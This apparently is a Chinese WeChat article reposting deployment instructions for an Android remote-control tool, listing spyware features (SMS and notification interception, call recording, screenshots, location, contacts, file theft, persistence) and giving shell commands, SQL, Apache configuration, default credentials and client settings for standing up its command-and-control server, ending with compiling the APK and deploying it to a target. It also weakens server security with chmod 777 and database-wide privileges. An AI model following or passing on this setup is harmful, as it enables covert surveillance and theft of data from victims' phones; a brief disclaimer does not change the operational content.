特征
-
通知监听器
-
短信监听
-
电话录音
-
图像捕获和屏幕截图
-
坚持
-
读取和写入联系人
-
列出已安装的应用程序
-
下载和上传文件
-
获取设备位置
安装
克隆存储库
安装 php、composer、mysql、php-mysql 驱动程序、apache2 和 a2enmod
将服务器文件移至/var/www/html/并安装依赖项
mv moukthar/Server/* /var/www/html/cd /var/www/html/c2-servercomposer installcd /var/www/html/web-ocket/composer installcd /var/wwwchown -R www-data:www-data .chmod -R 777 .
默认凭据是用户名:android和密码:the rastafarian in you
创建新的sql用户
CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password';GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost';FLUSH PRIVILEGES;
c2-server/.env在和中设置数据库凭据web-socket/.env
执行database.sql
在 Linux 中启动 Web 套接字服务器或部署为服务
php Server/web-socket/App.php# ORsudo mv Server/websocket.service /etc/systemd/system/sudo systemctl daemon-reloadsudo systemctl enable websocket.servicesudo systemctl start websocket.service
调整/etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>ServerAdmin webmaster@localhostDocumentRoot /var/www/html/c2-serverDirectoryIndex app.phpOptions -IndexesErrorLog ${APACHE_LOG_DIR}/error.logCustomLog ${APACHE_LOG_DIR}/access.log combined</VirtualHost>
调整/etc/apache2/apache2.conf
Comment this section#<Directory /># Options FollowSymLinks# AllowOverride None# Require all denied#</Directory>Add this<Directory /var/www/html/c2-server>Options -IndexesDirectoryIndex app.phpAllowOverride AllRequire all granted</Directory>
在 <script> 标记中设置 Web 套接字服务器地址c2-server/src/View/home.php
const ws = new WebSocket('ws://IP_ADDRESS:8080');使用以下命令重新启动 apache
sudo a2enmod rewrite && sudo service apache2 restart在客户端设置C2服务器和Web套接字服务器地址
functionality/Utils.javapublic static final String C2_SERVER = "http://localhost";public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";
使用 Android Studio 编译 APK 并部署到目标
后台回复:240424,获取工具
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白名单。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本公众号无关。
✦
✦
原文始发于微信公众号(白帽学子):Android C2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论